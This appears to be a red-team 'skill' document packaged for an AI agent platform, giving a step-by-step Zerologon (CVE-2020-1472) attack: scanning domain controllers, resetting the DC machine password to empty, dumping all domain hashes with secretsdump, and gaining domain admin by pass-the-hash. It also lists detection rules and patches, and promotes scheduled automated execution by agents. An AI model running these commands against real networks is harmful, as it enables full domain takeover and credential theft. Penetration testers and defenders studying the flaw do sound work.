Exploiting Zerologon Vulnerability (CVE-2020-1472)
Overview
Zerologon (CVE-2020-1472) is a critical elevation of privilege vulnerability (CVSS 10.0) in the Microsoft Netlogon Remote Protocol (MS-NRPC). The flaw exists in the cryptographic implementation of AES-CFB8 mode, where the initialization vector (IV) is incorrectly set to all zeros. This allows an unauthenticated attacker with network access to a domain controller to establish a Netlogon session and reset the DC machine account password to empty, achieving full domain compromise. Microsoft patched this vulnerability in August 2020 (KB4571694).
Prerequisites
- Network access to a Domain Controller (TCP port 135 and dynamic RPC ports)
- No authentication required (unauthenticated exploit)
- Target DC must not have the February 2021 enforcement mode enabled
- Impacket toolkit installed
- Written authorization for red team engagement
MITRE ATT&CK Mapping
| Technique ID | Name | Tactic |
|---|---|---|
| T1068 | Exploitation for Privilege Escalation | Privilege Escalation |
| T1210 | Exploitation of Remote Services | Lateral Movement |
| T1003.006 | OS Credential Dumping: DCSync | Credential Access |
| T1078.002 | Valid Accounts: Domain Accounts | Persistence |
Vulnerability Technical Details
Root Cause
The Netlogon authentication protocol uses AES-CFB8 encryption with a client challenge and server challenge. The vulnerability exists because:
- The IV is hardcoded to 16 bytes of zeros
- When the plaintext is 8 bytes of zeros, AES-CFB8 produces a ciphertext of all zeros with probability 1 in 256
- An attacker can send approximately 256 authentication attempts (takes ~3 seconds) to succeed
Affected Systems
- Windows Server 2008 R2 through Windows Server 2019
- All domain controllers running unpatched Netlogon service
- Samba versions < 4.8 (if running as AD DC)
Step 1: Identify Vulnerable Domain Controllers
# Scan for domain controllers
nmap -p 135,139,389,445 -sV --script=ms-sql-info,smb-os-discovery 10.10.10.0/24
# Check if DC is vulnerable using zerologon checker
python3 zerologon_tester.py DC01 10.10.10.1
# Using CrackMapExec
crackmapexec smb 10.10.10.1 -M zerologonStep 2: Exploit Zerologon
# Using Impacket's CVE-2020-1472 exploit
# This sets the DC machine account password to empty
python3 cve_2020_1472.py DC01$ 10.10.10.1
# Expected output:
# Performing authentication attempts...
# =========================================
# NetrServerAuthenticate2 Result: 0 (success after ~256 attempts)
# NetrServerPasswordSet2 call was successful
# DC01$ machine account password set to empty stringStep 3: DCSync with Empty Password
# Use the empty hash to perform DCSync
secretsdump.py -no-pass -just-dc corp.local/DC01\$@10.10.10.1
# Output includes all domain hashes:
# Administrator:500:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
# krbtgt:502:aad3b435b51404eeaad3b435b51404ee:f3bc61e97fb14d18c42bcbf6c3a9055f:::
# svc_sql:1103:aad3b435b51404eeaad3b435b51404ee:e4cba78b4c01d6e5c0e31ffff18e46ab:::
# Alternatively, dump specific accounts
secretsdump.py -no-pass corp.local/DC01\$@10.10.10.1 \
-just-dc-user AdministratorStep 4: Obtain Domain Admin Access
# Pass the Hash with Administrator NTLM
psexec.py -hashes :32ed87bdb5fdc5e9cba88547376818d4 \
corp.local/Administrator@10.10.10.1
# Or use wmiexec for stealthier access
wmiexec.py -hashes :32ed87bdb5fdc5e9cba88547376818d4 \
corp.local/Administrator@10.10.10.1Step 5: Restore Machine Account Password (CRITICAL)
WARNING: After exploiting Zerologon, the DC machine account password is empty, which will break Active Directory replication and services. You MUST restore it.
# Method 1: Use the exploit's restore functionality
python3 restorepassword.py corp.local/DC01@DC01 -target-ip 10.10.10.1 \
-hexpass <original_hex_password>
# Method 2: Force machine account password change from DC
# Connect to DC as Administrator and run:
netdom resetpwd /server:DC01 /userd:CORP\Administrator /passwordd:*
# Method 3: Restart the DC (it will auto-regenerate machine password)
# This is the safest method but causes downtimeDetection
Windows Event Logs
Event ID 4742: A computer account was changed
- Look for: DC$ account with password change
- Anomaly: Multiple 4742 events for DC$ in short period
Event ID 5805: Netlogon authentication failure
- Multiple failures followed by success = Zerologon attempt
Event ID 4624 (Type 3): Network logon
- DC$ account logging in from unexpected IPNetwork Detection
# Suricata rule for Zerologon
alert dcerpc any any -> any any (
msg:"ET EXPLOIT Possible Zerologon NetrServerReqChallenge";
flow:established,to_server;
dce_opnum:4;
content:"|00 00 00 00 00 00 00 00|";
sid:2030870;
rev:1;
)Sigma Rule
title: Zerologon Exploitation Attempt
status: stable
logsource:
product: windows
service: system
detection:
selection:
EventID: 5805
LogonType: 3
timeframe: 5m
condition: selection | count(EventID) > 100
level: critical
tags:
- attack.privilege_escalation
- attack.t1068
- cve.2020.1472Defensive Recommendations
- Apply patches immediately - KB4571694 (August 2020) and enforce February 2021 mode
- Enable enforcement mode via registry:
FullSecureChannelProtection = 1 - Monitor Event ID 5805 for repeated Netlogon failures
- Deploy Microsoft Defender for Identity (detects Zerologon automatically)
- Network segmentation - Restrict direct access to DCs from user networks
- Block Netlogon RPC from non-DC systems where possible
Verification Criteria
Confirm successful execution by validating:
- [ ] All prerequisite tools and access requirements are satisfied
- [ ] Each workflow step completed without errors
- [ ] Output matches expected format and contains expected data
- [ ] No security warnings or misconfigurations detected
- [ ] Results are documented and evidence is preserved for audit
Compliance Framework Mapping
This skill supports compliance evidence collection across multiple frameworks:
- SOC 2: CC4.1 (Monitoring & Evaluation), CC7.1 (Monitoring)
- ISO 27001: A.14.2 (Secure Development), A.18.2 (Information Security Reviews)
- NIST 800-53: CA-8 (Penetration Testing), RA-5 (Vulnerability Scanning)
- NIST CSF: ID.RA (Risk Assessment), PR.IP (Information Protection)
Claw GRC Tip: When this skill is executed by a registered agent, compliance evidence is automatically captured and mapped to the relevant controls in your active frameworks.
Deploying This Skill with Claw GRC
Agent Execution
Register this skill with your Claw GRC agent for automated execution:
# Install via CLI
npx claw-grc skills add exploiting-zerologon-vulnerability-cve-2020-1472
# Or load dynamically via MCP
grc.load_skill("exploiting-zerologon-vulnerability-cve-2020-1472")Audit Trail Integration
When executed through Claw GRC, every step of this skill generates tamper-evident audit records:
- SHA-256 chain hashing ensures no step can be modified after execution
- Evidence artifacts (configs, scan results, logs) are automatically attached to relevant controls
- Trust score impact — successful execution increases your agent's trust score
Continuous Compliance
Schedule this skill for recurring execution to maintain continuous compliance posture. Claw GRC monitors for drift and alerts when re-execution is needed.
References
- CVE-2020-1472: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-1472
- Secura Whitepaper: https://www.secura.com/blog/zero-logon
- CrowdStrike Advisory: https://www.crowdstrike.com/blog/cve-2020-1472-zerologon-security-advisory/
- CISA Alert AA20-283A: https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-283a
- Microsoft Enforcement: https://support.microsoft.com/en-us/topic/how-to-manage-the-changes-in-netlogon-secure-channel-connections-associated-with-cve-2020-1472-f7e8cc17-0309-1d6a-304e-5ba73f3a1f24